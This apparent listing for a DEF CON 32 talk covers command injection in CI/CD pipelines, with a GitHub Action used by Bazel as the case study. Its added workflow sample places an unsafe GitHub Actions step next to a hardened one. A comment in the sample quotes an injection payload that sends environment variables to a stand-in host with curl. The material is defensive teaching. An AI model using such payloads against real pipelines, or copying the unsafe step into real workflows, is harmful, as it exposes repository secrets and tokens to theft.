Overview
Explore a class of critical security vulnerabilities in CI/CD pipelines through this DEF CON 32 conference talk, which shows how command injection in pipeline components (workflows and the reusable actions they call) can compromise major projects. The talk walks through a detailed case study of a command injection vulnerability the speakers found in a GitHub Action used by Bazel, Google's open-source build system, and includes live demonstrations of how an attacker can exploit such a weakness in the pipeline to push malicious code into widely used repositories, without ever touching the project's own source. It closes with practical guidance on securing CI/CD pipelines and on protections that keep a development project from being exposed to the same kind of attack.
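The injection pattern the talk describes is, in its simplest form, a GitHub Actions `${{ }}` expression that places attacker-controlled event data directly into a `run:` script. The following workflow is an added illustration written for this listing; it is not the talk's code and not Bazel's, and the workflow name, job names and the sample payload are hypothetical. The first job is the vulnerable shape, the second is the hardened shape that passes the same value through an environment variable:

```yaml
# Added illustration (not the talk's or Bazel's code): a step vulnerable to
# GitHub Actions expression injection, beside the hardened form.
# Workflow and job names are hypothetical.
name: issue-triage

on:
  issues:
    types: [opened]

jobs:
  vulnerable:
    runs-on: ubuntu-latest
    steps:
      # ${{ }} is expanded by the runner BEFORE the shell ever sees the
      # script, so the title is pasted into the command line as code.
      # An issue opened with the title (hypothetical payload)
      #   x"; curl -d "$(env)" https://evil.example/collect #
      # closes the quote and runs attacker-chosen commands with the job's
      # GITHUB_TOKEN and any secrets the step exposes.
      - name: Echo title (unsafe)
        run: echo "New issue: ${{ github.event.issue.title }}"

  hardened:
    runs-on: ubuntu-latest
    permissions:
      contents: read          # least privilege for the token as well
    steps:
      # The expression is evaluated into an environment variable, and the
      # shell expands "$ISSUE_TITLE" as a single quoted string, so every
      # character of the title is treated as data rather than as syntax.
      - name: Echo title (safe)
        env:
          ISSUE_TITLE: ${{ github.event.issue.title }}
        run: echo "New issue: $ISSUE_TITLE"
```

The same rule applies to any context an outside party can influence (pull request titles and bodies, branch names, commit messages, review comments, `inputs` forwarded by a calling workflow): never interpolate it into `run:` with `${{ }}`, always route it through `env:`. The check a practitioner wants is a linter pass over every workflow and composite action in the repository; actionlint, for example, flags untrusted contexts used directly inside `run:` scripts.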
Syllabus
DEF CON 32 - Your CI CD Pipeline Is Vulnerable, But It's Not Your Fault - Elad Pticha, Oreen Livni
Taught by
DEFCONConference